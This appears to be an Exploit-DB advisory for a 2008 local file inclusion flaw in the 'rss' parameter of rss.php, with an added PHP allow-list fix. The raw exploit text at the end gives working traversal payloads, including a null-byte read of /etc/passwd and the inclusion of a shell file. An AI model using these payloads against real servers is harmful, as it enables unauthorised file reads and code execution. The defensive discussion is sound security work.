Vendor: N/A
By: JIKO
CVSS: 7.5 (HIGH)
Type: Local File Inclusion
CWE: 22
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

Local File Inclusion Vulnerabilities

The vulnerability is caused by improper validation of user-supplied input in the 'rss' parameter of the 'rss.php' script. The parameter can be used to include arbitrary local files via directory traversal.

Mitigation:

Input validation should be used to prevent directory traversal attacks.
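
One way to apply that validation to a parameter like 'rss', shown as an added example and not as code from the affected product, whose source does not appear on this page. The feed names, the feeds/ directory and the function name resolve_feed() are assumptions made for illustration.

```php
<?php
// Added example, not the product's code. FEED_DIR, ALLOWED_FEEDS and
// resolve_feed() are hypothetical names chosen for illustration.
declare(strict_types=1);

const FEED_DIR = __DIR__ . '/feeds';
const ALLOWED_FEEDS = ['news', 'comments', 'downloads']; // constructed sample names

/**
 * Map a user-supplied feed name to a file inside FEED_DIR.
 * Returns the absolute path, or null if the name must be rejected.
 */
function resolve_feed(string $name): ?string
{
    // 1. Allow-list: only known feed names ever reach the filesystem.
    //    Values containing "../", an absolute path or a NUL byte can
    //    never match, so they are rejected without any string cleaning.
    if (!in_array($name, ALLOWED_FEEDS, true)) {
        return null;
    }

    // 2. Defence in depth: resolve symlinks and ".." segments, then
    //    confirm the result is still located under FEED_DIR.
    $base = realpath(FEED_DIR);
    $path = realpath(FEED_DIR . '/' . $name . '.php');
    if ($base === false || $path === false) {
        return null; // directory or file does not exist
    }
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null; // resolved outside the feed directory
    }
    return $path;
}

// Request handling: a non-string value (e.g. rss[]=x) is rejected as well.
$requested = $_GET['rss'] ?? '';
$file = is_string($requested) ? resolve_feed($requested) : null;
if ($file === null) {
    http_response_code(404);
    exit('Unknown feed');
}
require $file;
```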

Exploit-DB raw data:

####################################################################################
######              Local File Inclusion Vulnerabilities                       #####
###### http://www.the-ghost.com/extras/am2/am%202.0%20beta%201.zip             #####
###### author : JIKO                                                           #####
###### for read a php file >     ?rss=[name of file without php]               #####
###### for execute exploit does not write extension of file                    #####
######                                                                         #####
######                                                                         #####
###### exploit : /Script/rss.php?rss=../[name of file without php]             #####
######                                                                         #####
###### example : /Script/rss.php?rss==/home/user/shell                         #####
######                                                                         #####
###### other files:        rss=../../../../etc/passwd%00                       #####
######           WwW.No-exploit.Com  cha7ta.eu                                 #####
######  H-T Team , v4 Team  , Tryag , no-Back all my friend                    #####
####################################################################################
------==        troops of Mohamed comming inchalah     =-----------------
Ana muslim , Ana 3arabi , Ana Magribi , bladi maroc

# milw0rm.com [2008-09-29]